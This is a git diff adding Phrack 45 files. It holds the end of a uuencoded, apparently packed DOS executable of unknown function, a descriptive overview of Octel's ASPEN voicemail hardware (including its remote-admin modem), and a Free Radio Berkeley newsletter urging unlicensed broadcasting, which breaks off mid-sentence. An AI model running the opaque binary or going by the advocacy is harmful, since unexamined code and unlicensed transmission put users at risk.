+M[_>+7@B(7M^,_^ZY!0`8E/SN$Q5*N1[TV;`@F3\`V8;[`EX&U.W9#VOVT`K^
+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
+A,V$S````````````````````````````````````````
+`
+end
diff --git a/phrack45/23.txt b/phrack45/23.txt
new file mode 100644
index 0000000..3759bd6
--- /dev/null
+++ b/phrack45/23.txt
@@ -0,0 +1,257 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 23 of 28
+
+****************************************************************************
+
+                           AN INTRODUCTION TO OCTELS
+                      AUTOMATIC SPEECH EXCHANGE NETWORK
+                                BY OPTIK NERVE
+                              (nerve@netaxs.com)
+
+
+The Automatic SPeech Exchange Network, or ASPEN for short, is a high
+performance voice processing system which interfaces and integrates with a
+variety of PBX and Central Office (CO) equipment. Interfaced systems require
+the caller to enter an extension, while integration provides a personal
+greeting automatically. Both of these provide the ability to return to the
+operator if necessary. ASPEN systems offer voice mail, Information Center
+Mail-Boxes (ICMB), Enhanced Call Processing (ECP), networking, and
+transaction processing. The Aspen, Branch, Branch XP, and VPC 100 hardware
+is only significantly different in their port and drive capacities. The
+following information is presented to introduce an overview of the hardware
+in an ASPEN system, and its function for it as a whole. This is not a
+"how-to" file and you will not find anything related to fraud in this
+article.
+
+
+SYSTEM COMPONENTS LIST
+-=-=-=-=-=-=-=-=-=-=-=-
+
+Each ASPEN system contains the main cardcage, the I/O cardcage, the drives,
+power supplies, and the system manager terminal. The system manager printer
+is optional. ASPEN hardware consists of:
+
+    o  CPU Board
+    o  File card
+    o  Line board
+    o  Telephone Interface Card (TIC)
+    o  Scanner board
+    o  Winchester drives
+    o  Power supplies
+    o  System manager terminal
+    o  System manager printer (optional)
+
+The cardcages of the system contain the following boards, each identifiable
+by a unique color coded tab indicating the slot into which the board fits.
+
+ MAIN CARDCAGE
+
+    o  CPU (yellow)
+    o  File card (dark green)
+    o  Line boards (light green)
+
+ INPUT/OUTPUT CARDCAGE
+
+    o  Scanner board (pink)
+    o  TICs (purple)
+
+
+SYSTEM COMPONENTS OVERVIEW
+-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+The following subsections present a functional description of the
+characteristics considered standard on ASPEN system hardware.
+
+
+CENTRAL PROCESSING UNIT
+~~~~~~~~~~~~~~~~~~~~~~~
+The CPU board contains a microprocessor with access to one megabyte of
+RAM. It is identical, in function, to a personal computers' CPU,
+executing instructions, and controlling serial I/O to the scanner board
+and system manager terminal.
+
+SYSTEM DATA BUSES
+~~~~~~~~~~~~~~~~~
+System communication between the boards uses three main buses: the control
+bus, the data bus, and the polling/status bus. The eight megahertz control bus
+works on a request/response procotol; for each 16 byte message sent by the
+CPU to a board, a 16 byte response must be sent back to the CPU. The data bus
+moves large amounts of data (20KB transfers) between the CPU, file card, and
+line boards at eight megahertz. All digitized speech to and from the line
+boards and file card travel on this bus. The polling/status control bus is
+used only between the scanner board and TICs. The scanner board polls each TIC
+port for an on-hook/off-hook status every ten milliseconds.
+
+FILE CARD
+~~~~~~~~~
+The file card controls the drives and is the primary system file manager.
+The file card controls the Winchester ST-506 interface. The file card also
+stores frequently used prompts of less than three seconds in a speech cache
+memory.
+
+LINE BOARD
+~~~~~~~~~~
+The line board contains microprocessors with access to 128KB of RAM. The
+line board has four channels, each matching a channel on a TIC. The Aspen may
+contain as many as six line boards, but this is limited to four, and even
+two on lower end Aspen models. Line boards perform several important
+functions including: encoding and decoding of digitized speech, tone
+detection, DTMF detection, silence detection, speed control, and DTMF tone
+generation. Speech is encoded at a rate of 25K samples per second using Delta
+modulation. Each of the four channels on the line board has a tone detection
+circuit, which detects dial, busy, reorder, and ringback tones generated by
+most PBXs and COs. The proprietary design limits talk-off during message
+playback.  Talk-off may occur when the voice generates tones similar to DTMF
+tones.  Silence detection recognizes spaces between words so that the voice
+message can be compressed for disk storage, optimizing disk space. The
+system also recognizes silence during message recording and prompts the user
+to continue.  The line board controls message playback speed without
+affecting voice frequency pitch by controlling the amount of silence
+between words.  Playback can be normal, slow, or fast. The line board is
+equipped with a tone generator used for dialing when ASPEN places an
+outcall or transfers a call.
+
+TELEPHONE INTERFACE CARDS
+~~~~~~~~~~~~~~~~~~~~~~~~~
+The Telephone Interface Cards (TICs) provide interfaces to either the
+Public Switched Telephone Network (PSTN) including CO, or to a PBX. In
+most installations, the TIC emulates a regular telephone to the PBX or the
+CO.  Octel Communications has special TICs that emulate electronic digital
+sets in a Mitel PBX and ROLM PBX. The four channels on a TIC connect
+directly to the four channels on a line board. The TICs use transformers to
+provide electrical isolation to protect the line board and the network or PBX.
+The TICs communicate with the scanner board through the polling/status
+control bus located on the I/O backplane.
+
+SCANNER BOARD
+~~~~~~~~~~~~~
+The scanner board, as mentioned above,  communicates with all TICs through
+the polling/status control bus. By continually polling all TIC channels, the
+scanner board detects new incoming calls and reports this change in status
+information to the CPU board though one of the four serial I/O ports. It also
+provides RS-232 data connection to the PBX when required, and the serial I/O
+port which interfaces the system managers terminal with the CPU. The scanner
+board includes a built in modem used to remotely access the system
+administration functions. The local system manager terminal and the modem
+circuit share the same serial I/O port, and the first connection has priority
+over the second. (ie: If the modem is connected, the local system manager
+terminal cannot access the system)
+
+SYSTEM MANAGER TERMINAL/PRINTER
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The system manager terminal is used to enter and change information within
+the system database. The system manager terminal is a Wyse 50 terminal
+used by ASPEN to report administrative information. The printer is an
+optional device used to produce a hard copy of output produced.
+
+DISK COMMUNICATOR
+~~~~~~~~~~~~~~~~~
+The Disk Communicator provides connections between the file card and the
+drives. If more than four drives are installed, a multiplexer (MUX)
+communicator board selects the four drives in the first cabinet and the
+four drives in the second cabinet.
+
+WINCHESTER DRIVES
+~~~~~~~~~~~~~~~~~
+These drives store system software, mailboxes, voice prompts, messages, and
+greetings. Octel Communications uses its own formatting technique and disk
+controllers. Standard drives are formatted for a capacity of 60, 90, or 190
+megabytes. The drives (0-1) contains all software and voice prompts needed to
+operate the system.
+
+POWER SUPPLY
+~~~~~~~~~~~~
+The ASPEN power supply is located in the center of the system housed in a
+single case, which actually contains two supplies. One supplies +5/-5 and
++12/-12 volts to the boards, while the other provides +12 volts for the
+drive motors. There are no replaceable fuses in an ASPEN system. If the
+current draw or input voltage reaches a defined level, the power supply
+turns itself off automatically, necessitating a reset of a single circuit
+breaker.
+
+SPECIAL INTEGRATION DEVICES
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Woobox and the PBX Integration Device (PID) provide integration to
+different PBXs. These devices stand alone and are peripheral to the ASPEN
+chassis. ASPEN integrates with the AT&T Systems 75 and 85 using an A/PID.
+
+
+THE CALL PROCESS
+-=-=-=-=-=-=-=-=-
+
+The following is a general description of a typical call through ASPEN and
+the boards involved in the process:
+
+  o  Subscriber dials the ASPEN pilot number, either directly or is
+     forwarded to APSEN by the PBX.
+  o  A TIC senses ring voltage and raises a flag to indicate an
+     incoming call.
+  o  The scanner board polls all TICs for change of status using the
+     polling/status control bus and detects the raised flag.
+  o  The scanner board commands the TIC to answer the call (go off-hook)
+     by sending a command on the polling/status control bus
+  o  The scanner board alerts the CPU board of an incoming call
+     by sending port identification information over the serial
+     I/O port.
+  o  The CPU commands the corresponding port on the line board to
+     begin listening for DTMF tones, silence, or dial tone. The line
+     board informs the CPU of call process through the control bus.
+  o  The CPU commands the file card to send digitized voice prompts,
+     "Hello, this is ASPEN...", over the data bus to the proper
+     port on the line board. The line board converts these prompts
+     to analog and passes them to the TIC
+  o  The caller dials the desired destination number through DTMF.
+     The line board interprets these and passes the information
+     to the CPU.
+  o  The CPU instructs the file card to find the user record of the called
+     party, check for the location of the personal greeting, retrieve the
+     greeting, and pass it to the line board. The line board converts the
+     greeting to analog and passes it to the TIC
+  o  After the greeting plays, the caller records a message. The line board
+     digitizes speech and stores it in buffers of six seconds each (20KB)
+  o  Using the control bus, the CPU sets a data bus transfer between the line
+     board and file card. The file card decides which drive has the most free
+     space and where to wire this message. The six seconds of digitized speech
+     is transferred from the line board to the file card. The file card then
+     writes the six second segment to the disk. This process continues until
+     the caller finishes the message.
+  o  The file card updates the user record of the called party by placing 11
+     bytes in the mailbox. The 11 bytes define the message location on the
+     disk, sender, time, priority, and length.
+  o  The caller terminates the call by pressing the one key
+  o  The line board informs the CPU through the control bus that the call has
+     been terminated
+  o  The CPU commands the file card to send the good-bye prompt to the line
+     board which converts it to analog and passes it to the TIC
+  o  The CPU commands the scanner board to disconnect that port
+  o  The scanner board commands the TIC to hang-up (go on-hook) through the
+     polling/status control bus
+  o  The scanner board continues polling all TIC ports for change of status
+
+
+CONCLUSION
+-=-=-=-=-=-
+
+I hope this information provides you with a more solid background of
+how the ASPEN system functions. The basic aspects of this system can also
+apply to other similar PBX interfaces. Although the above information
+cannot really be used for anything illegal, I have provided it, for
+informational purposes, to those who "feed" on telco-bits as I do.
+
+Greets go out to: Ludichrist, Squarewave, the ID-Crew,
+                  #hack, and #phreak
+
+You can reach me at nerve@netaxs.com, but please use my following
+public key to encrypt all mail before sending it. Thank you...
+
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3
+
+mQCNAizV9xMAAAEEALvTChdFrhZvZ9wqJI8q7v0cEUdnjGBmoFGLzIWb1I8G9ZWA
+8rDmxxeU5NBtJ7uK4Ea74MCNL35TGEnuoRQNZl5af9iJDfJjs/LVKNCWwWrPRMUi
+6gPO6ui1bSfnvQn1ykZ2wj9fVwek9Is4Lneh1vOfpVMZPlTNRN23FvWw7yeVAAUT
+tB5PcHRpayBOZXJ2ZSA8bmVydmVAbmV0YXhzLmNvbT4=
+=K44O
+-----END PGP PUBLIC KEY BLOCK-----
diff --git a/phrack45/24.txt b/phrack45/24.txt
new file mode 100644
index 0000000..128412e
--- /dev/null
+++ b/phrack45/24.txt
@@ -0,0 +1,715 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 24 of 28
+
+****************************************************************************
+
+[The following is a message we received from Radio Free Berkeley
+ regarding their movement and radio kits.  I think these guys
+ have a great thing going, and I personally am taking measures
+ to get involved, (in my own special way.)  Now Austin FCC, don't
+ get your sphincters in a tizzy, because you won't be fining me
+ anytime soon, but you never know who that broadcaster is, now do
+ you?]
+
+------------------------------------------------------------------------------
+
+Chris,
+
+I have enclosed the most current newsletter from FRB is this email.
+Mondo 2000 just came out and has a 14 page article on Guerilla media with
+a lot of information about FRB and others.  We are trying to encourage as
+many people as possible to obtain transmitters and take to the air
+waves.  If this happens, it will be very difficult for the FCC to do very
+much, especially in areas of the country where the nearest FCC office is
+500 to 1000 miles away.  It is extremely important that the stranglehold
+on the free flow of ideas, information, art and culture be broken not
+only here but around the world as well.  China has just clamped down on
+broadcasting there, only state approved outlets and all satellite dishes
+have been banned was well.  We intend on putting an international
+shortwave station on the air, first broadcast will be New Years Eve.  It
+will be a call for no borders, tear down the walls and party down.  We hope
+to get people in the Bay Area who are in exile from their home countries
+for political activity to do 10 to 20 minutes programs in their
+native language which we will broadcast around the world on the 20 meter
+band.  Needless to say, the FEDS and their corporate masters are going to
+take a rather dim view of all this.  Their armies and police can not be
+everywhere at once, however.
+
+Anyway, good to hear from you.  Let me know if you need further information.
+
+Stephen Dunifer
+Free Radio Berkeley
+
+
+-------------------------
+
+                          RECLAIMING THE AIRWAVES
+Published by Free Radio Berkeley & Free Communications Coalition
+October 1993
+
+New Email Address: FRBSPD@CRL.COM
+
+Submissions encouraged and welcomed
+
+---------------------------------------------------------------------------
+
+               ***** FCC Uses 20 SF Cops to Obtain ID *****
+
+     In a scene resembling a French noir film, one person associated with
+San Francisco Liberation Radio was detained by 20 SF police officers until
+his ID could be presented to FCC agent David Doon.  At approximately 9:30
+PM on Wednesday, September 22, Richard Edmondson was approached by David
+Doon who asked for identification.   After refusing to produce
+identification and answer any questions,  Richard drove away and was
+stopped on Webster St. by SF police officers who blocked off the entire
+northbound lane of the street with 8 vehicles.  A confused scene ensued
+wherein the police officers had virtually no idea of what was going on or
+why they such massive backup had been called.  Richard was ordered to get
+out of his vehicle with his hands up and in clear sight by clearly agitated
+SF police who subsequently handcuffed him.  SF police officers were heard
+to say "who is this guy" and "what do we have him for" - for several
+minutes these questions went unanswered.  By the time the FCC agent arrived
+to examine Richard's ID there were at least 20 SF police officers on the
+scene.  After learning of what was going on some of the officers were
+clearly exasperated at having their time wasted by this FCC agent.  A few
+were amused and asked for information regarding San Francisco Liberation
+Radio's frequency and broadcast schedule.  After Richard's ID was verified
+he was released without any further consequences by the SF police.
+     Richard described it this way, "Before it was all over there were at
+least 20 police officers on the scene.  They were all so pumped up with
+adrenaline you would have thought I had committed the crime of the century.
+It was clearly irresponsible for this FCC agent to call for such a massive
+response without giving clear reason or instruction to the SF police.  When
+police officers go into a situation not knowing the details they naturally
+assume the worst.  For one dark moment I feared my life was in danger."
+     Clearly, this was an obvious case of overreaction by FCC agent David
+Doon who clearly endangered the life of Richard Edmondson by calling in
+such a massive police response.  The FCC must be held accountable for the
+actions of their agents who use such extremely excessive and reactionary
+methods to suppress a growing micro power broadcasting movement.  It would
+have sufficed for David Doon to have written down the license plate # of
+Richard's vehicle and run a DMV check.  As more micro power broadcasters go
+on the air in the Bay area and Northern California we can anticipate
+further actions by the FCC to harass and intimidate those involved.
+However, we shall not be moved by their threats and police state tactics.
+
+--------------------------------------------------------------------------
+
+           ***** BUSH RADIO UNDER ATTACK IN SOUTH AFRICA  *****
+
+4 October, 1993
+
+AMARC Solidarity Action Network received this urgent demand today
+from Bush Radio, a community radio project in Cape Town, South
+Africa.
+
+An Action Alert was first issued in support of Bush Radio when its
+equipment was seized in May. For a copy of that Alert, send a request
+to amarc@web.apc.org.30th September, 1993
+
+OPEN LETTER RE:  PROSECUTION OF BUSH RADIO
+
+To Bush Radio's Members, Users Friends and Supporters
+
+Bush Radio is being prosecuted for starting a community radio
+station. We are charged on three counts:
+     1.   illegal broadcasting
+     2.   illegal possession of broadcast apparatus, and
+     3.   obstructing the course of justice.
+
+These charges are being leveled at two of our members, who face
+stiff penalties: R10,000 and/or 3 years imprisonment each on the
+first two counts alone.
+
+The first court appearance is set for October 13. We now need
+your support to stop the victimization of genuine community radio
+before it even gets going.
+
+Bush radio is a community radio initiative, owned and controlled
+by its membership, a wide range of organizations and individuals.
+For more than two years we planned and talked about going on air.
+Our attempts to get a broadcasting license from the Ministry for
+Home Affairs were repeatedly frustrated, and our membership
+eventually decided that we should go ahead without one.
+
+So from 4 - 8 pm on Sunday April 1993, listeners on the Cape
+Flats heard a mix of programs produced and presented by our
+"networkers" (volunteer producers from the community). Scores of
+other people were there, and all of them had a chance to go on
+air, most of them for the first time in their lives.
+
+In the week that followed the state seized our transmission
+equipment, effectively silencing us on the eve of our second
+broadcast, scheduled for May 1st. About six weeks later we were
+warned that the state was considering laying charges against us.
+Last week charge sheets were served on our lawyers, to appear
+before a regional court on October 13th.
+
+For the state to take such action at this time seems to
+contradict their professed commitment to a more open South
+Africa. We are being charged in terms of laws inspired by
+apartheid at the very same time that new legislation passes
+through parliament - including bills for the transitional
+Executive Council and an Independent Broadcasting Authority,
+drawn up by parties at the negotiations.
+
+The enforcement of these charges could have serious consequences
+for us at Bush Radio. For an organization which employs a staff
+of only two people, we do a disproportionate amount of work, and
+can ill afford to be spending time on defending unnecessary legal
+action. Bush Radio runs a range of training programs aimed at
+bringing new voices into the broadcasting environment. We work
+with a number of organizations, producing programs that are
+distributed either on audio-cassette or on other radio stations.
+Substantial time and energy is invested in building up a network
+of volunteers, the backbone of a truly participatory community
+radio. A lot of time is spent providing support to others who
+want to start radio stations in their own communities.
+
+Despite our modest resources, Bush radio has become something of
+a "flagship" for the emerging community radio sector in SouthAfrica.
+For us to be criminalized could weaken the growth of this
+new sector which holds such real potential for communities
+wanting to control their own development.
+
+We were always open and peaceful in our methods, and feel that
+this treatment is misplaced. To drag us through the courts is a
+waste of time and money, not only for Bush Radio but also for the
+taxpayer who foots the bill.
+
+We hope the charges might be dropped, and seek your support in
